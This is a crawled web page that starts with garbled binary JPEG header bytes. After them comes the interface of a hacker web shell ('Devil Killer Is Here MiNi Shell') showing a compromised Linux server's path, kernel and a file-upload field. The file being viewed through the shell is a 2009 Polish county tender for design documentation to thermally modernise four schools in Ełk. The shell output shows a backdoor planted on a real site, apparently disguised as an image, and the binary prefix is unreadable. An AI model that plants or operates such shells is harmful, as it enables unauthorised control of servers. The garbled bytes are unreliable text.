JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090225/42275-N-2009.html

<p class="kh_header"><b>Ełk: Opracowanie dokumentacji techniczno - projektowej dla zadania: Termomodernizacja budynków użyteczności publicznej w Subregionie Ełckim</b><br>
<b>Numer ogłoszenia: 42275 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ełcki , ul. Piłsudskiego 4, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6218300, faks 087 6218339.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji techniczno - projektowej dla zadania: Termomodernizacja budynków użyteczności publicznej w Subregionie Ełckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie dokumentacji techniczno - projektowej dla zadania: Termomodernizacja budynków użyteczności publicznej w Subregionie Ełckim.

Szczegółowy zakres realizacji przedmiotu zamówienia:
1.	Wykonanie inwentaryzacji obiektów w zakresie potrzeb związanych z planowaną termomodernizacją zawartą w posiadanych przez Zamawiającego audytach energetycznych i przedstawienie do uzgodnienia wariantów koncepcji planowanego zakresu inwestycji. 
2.	Projekty techniczne dla każdej placówki oddzielnie, które powinny zawierać:
1.	Projekty budowlane ,
2.	Projekty branżowe,
3.	Komplety kosztorysów inwestorskich - 4 egz.,
4.	Komplety kosztorysów ślepych - 4 egz.,
5.	Specyfikację techniczną wykonania i odbioru robót,
6.	Proponowany harmonogram realizacji robót budowlanych,
7.	Oświadczenie o sporządzeniu projektu budowlanego, zgodnie z obowiązującymi przepisami oraz zasadami.
3. Uzyskanie prawomocnego pozwolenia na budowę wraz z wymaganymi uzgodnieniami na  zaprojektowany zakres robót.

Wykonawca dostarczy ww. dokumentację w 6 egzemplarzach w formie papierowej, z wyjątkiem pozycji 3 i 4 po 4 egzemplarze, oraz w 2 egzemplarzach w formie elektronicznej na nośniku danych CD w formacie PDF. Wykonawca przekaże nieodpłatnie materialne prawa autorskie opracowanych dokumentacji Zamawiającemu.

Zakres prac objętych opracowaniem w poszczególnych placówkach/budynkach użyteczności publicznej:
1)	Zespół Szkół nr 2 im. K. K. Baczyńskiego w Ełku, ul. Sikorskiego 7 - budynek szkoły: 
Powierzchnia  zabudowana - 2023,8 m2, Kubatura - 21316 m3, Pow. użytkowa ogrzewana w  budynku - 5380 m2, Pow. użytkowa - 3458 m2, Budynek główny - trzykondygnacyjny podpiwniczony, Łącznik - jednokondygnacyjny podpiwniczony, Sala gimnastyczna - jednokondygnacyjna niepodpiwniczona, Zaplecze sali gimnastycznej - jedno i dwukondygnacyjne niepodpiwniczone, Rok budowy 1973

a)	Ocieplenie stropodachu szkoły, łącznika, i zaplecza części parterowej sali gimnastycznej, 
b)	Ocieplenie ścian zewnętrznych piwnic i szkoły, 
c)	Wymiana okien w budynku szkoły, 
d)	Wymiana okien w części sportowej sali gimnastycznej, 
e)	Wymiana drzwi zewnętrznych, 
f)	Ocieplenie ścian zewnętrznych sali gimnastycznej, 
g)	Ocieplenie ścian zewnętrznych szkoły, łącznika i zaplecza sali gimnastycznej,
h)	Modernizacja instalacji c.o. obejmująca montaż zaworów termostatycznych przy grzejnikach, regulację instalacji, wymianę sieci cieplnej na preizolowaną od węzła do budynku szkoły. 

2) Zespół Szkół nr 3 im. J. i H. Małeckich w Ełku, ul. Koszykowa 1: 
A) budynek szkoły: 
Powierzchnia zabudowana - 825,5 m2, Kubatura budynku - 9658 m3, Pow. użytkowa ogrzewanej części budynku - 2188 m2, Pow. użytkowa - 690 m2, Budynek wolnostojący trzykondygnacyjny częściowo podpiwniczony, Rok budowy 1972

a)	Wymiana - okna i drzwi,
b)	Ocieplenie - stropodach wentylowany,
c)	Ocieplenie - ściany poprzeczne, 
d)	Ocieplenie - ściany podłużne, 
e)	Modernizacja instalacji c.o.

B) sala gimnastyczna: 
Powierzchnia zabudowana - 470,40 m2, Kubatura budynku - 2752 m3, Pow. użytkowa ogrzewana w  budynku - 413 m2, Pow.  użytkowa - 210 m2, Budynek wolnostojący jednokondygnacyjny, Rok budowy 1972 

a)	Wymiana - okna i drzwi,
b)	Ocieplenie - stropodach wentylowany,
c)	Ocieplenie - stropodach niewentylowany,, 
d)	Ocieplenie - ściany poprzeczne,
e)	Ocieplenie - ściany podłużne,
f)	Ocieplenie - podłoga na gruncie,
g)	Modernizacja instalacji c.o.

C) warsztaty: 
Powierzchnia zabudowana - 525,60 m2, Kubatura budynku - 5573 m3, Pow. użytkowa ogrzewana w  budynku - 870 m2, Pow. użytkowa - 502,5 m2, Budynek wolnostojący trzykondygnacyjny podpiwniczony, Rok budowy 1972

a)	Ocieplenie - ściany poprzeczne,
b)	Ocieplenie - strop nad piwnicą,
c)	Wymiana - okna i drzwi,
d)	Ocieplenie - stropodach niewentylowany,
e)	Ocieplenie - ściany podłużne,
f)	Modernizacja instalacji c.o. 

3) Zespół Szkół nr 5 im. K. Brzostowskiego w Ełku, ul. Sikorskiego 5 - budynek szkoły: 
Powierzchnia zabudowana - 1982,6 m2, Kubatura budynku 20951 m3 , Pow. użytkowa ogrzewana w  budynku - 5703 m2, Pow. użytkowa - 3706 m2,  Budynek główny - trzykondygnacyjny podpiwniczony, Łącznik - jednokondygnacyjny niepodpiwniczony, Łącznik 2 jednokondygnacyjny niepodpiwniczony, Sala gimnastyczna - jednokondygnacyjna niepodpiwniczona, Zaplecze sali gimnastycznej - jedno i dwukondygnacyjne niepodpiwniczone, Rok budowy 1972

a)	Ocieplenie stropodachu sali gimnastycznej,
b)	Ocieplenie stropodachu nad zapleczem sali gimnastycznej, 
c)	Ocieplenie stropodachu szkoły i łączników, 
d)	Wymiana okien,
e)	Ocieplenie posadzki w piwnicy i zapleczu sali gimnastycznej, 
f)	Ocieplenie ścian zewnętrznych piwnic szkoły, 
g)	Wymiana okien w części sportowej sali gimnastycznej, 
h)	Ocieplenie ścian zewnętrznej szkoły, łączników i zaplecza sali, 
i)	Ocieplenie ścian zewnętrznych części sportowej sali gimnastycznej,
j)	Modernizacja instalacji c.o. obejmująca częściową wymianę., montaż zaworów termostatycznych przy grzejnikach, regulację instalacji.

4) Specjalny Ośrodek Szkolno - Wychowawczy w Ełku, ul. Grajewska 16A - budynek szkoły z salą gimnastyczną: 
Powierzchnia zabudowana - 1288 m2, Kubatura -11626 m3, Pow. użytkowa ogrzewana w  budynku -- 3174 m2, Pow. użytkowa - 1651 m2, Budynek główny część A - dwukondygnacyjny podpiwniczony, Budynek główny część B - dwukondygnacyjny podpiwniczony, Łącznik - jednokondygnacyjny niepodpiwniczony, Sala gimnastyczna - jednokondygnacyjna niepodpiwniczona, Rok budowy 1964

1.	Ocieplenie stropodachu szkoły, łącznika i zaplecza sali gimnastycznej,
2.	Ocieplenie stropodachu sali gimnastycznej,
3.	Ocieplenie ścian zewnętrznych szkoły, łącznika i zaplecza sali gimnastycznej,
4.	Ocieplenie ścian zewnętrznych sali gimnastycznej,
5.	Wymiana okien,
6.	Ocieplenie ścian zewnętrznych piwnic szkoły,
7.	Wymiana drzwi zewnętrznych,
8.	Modernizacja instalacji c.o.  obejmująca montaż zaworów termostatycznych przy grzejnikach, płukanie chemiczne i regulację instalacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłacenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą  ubiegać  się Wykonawcy, którzy:  
1.    Spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tzn.: 
a)	Posiadają uprawnienia  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
b)	Posiadają  niezbędną  wiedzę  i  doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 
c)	Znajdują  się  w  sytuacji  ekonomicznej  i  finansowej zapewniającej wykonanie zamówienia. 
d)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
2.	   Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania co najmniej dwóch usług odpowiadających  przedmiotowi niniejszego zamówienia. 
3.	Za spełnienie warunku dysponowania osobami posiadającymi niezbędną wiedzę i doświadczenie do wykonania zamówienia  Zamawiający uzna wykazanie się  przez Wykonawcę dysponowaniem co najmniej 2 osobami. 
4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których mowa w ust. 1. pkt a-c niniejszego rozdziału. W przypadku konsorcjum żaden z wykonawców wspólnie ubiegających się  o  udzielenie  zamówienia  nie  może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 
5.	Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/niespełnia. Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale VII SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. W przypadku  niespełnienia   jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy. 
6.	W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem,
2) wypełniony formularz ofertowy stanowiący załącznik Nr 1 do SIWZ,
3) oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Prawa zamówień publicznych wraz z oświadczeniem o niepodleganiu wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Prawa zamówień publicznych - Załącznik Nr 2 do SIWZ,
4) wykaz wykonanych przez Zamawiającego w ciągu ostatnich 5 lat  dokumentacji o podobnym zakresie oraz wartości, zgodnie ze wzorem stanowiącym Załącznik nr 3 do SIWZ;
5) wykaz osób zdolnych do wykonania zamówienia zgodnie ze wzorem stanowiącym Załącznik nr 4 do niniejszej SIWZ,  wraz z dołączonymi kserokopiami dokumentów stwierdzającymi, że osoby wymienione w zał. nr 4 posiadają wymagane uprawnienia oraz kserokopie aktualnych zaświadczeń o przynależności tych osób do właściwej izby samorządu zawodowego,
6) wykaz podwykonawców (jeśli dotyczy) zgodnie ze wzorem stanowiącym Załącznik nr 5 do niniejszej SIWZ,
7) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
8) pełnomocnictwo do podpisania oferty i załączników, o ile prawo do reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą,
9) aktualne zaświadczenie z Urzędu Skarbowego i Zakładu Ubezpieczeń Społecznych 
o niezaleganiu w opłacaniu podatków i składek, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
10) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych. W przypadku konsorcjum dokumenty, o których mowa w pkt.1, 7, 8, 9 niniejszego rozdziału składa każdy z Wykonawców oddzielnie. Dokumenty wskazane w pkt. 4-6 niniejszego rozdziału mogą zostać złożone przez jednego z Wykonawców albo wspólnie. Załączniki, o których mowa w pkt. 2 i 3 niniejszego rozdziału składane są przez Wykonawców wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.elk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ełku, ul. Piłsudskiego 4, 19-300 Ełk, pok. 90, tel. (087) 621 83 36, Pani Agnieszka Pietrowicz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2009 godzina 10:00, miejsce: Starsostwo Powiatowe w Ełku, ul. Piłsudskiego 4, 19-300 Ełk, sekretariat pok. 27.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com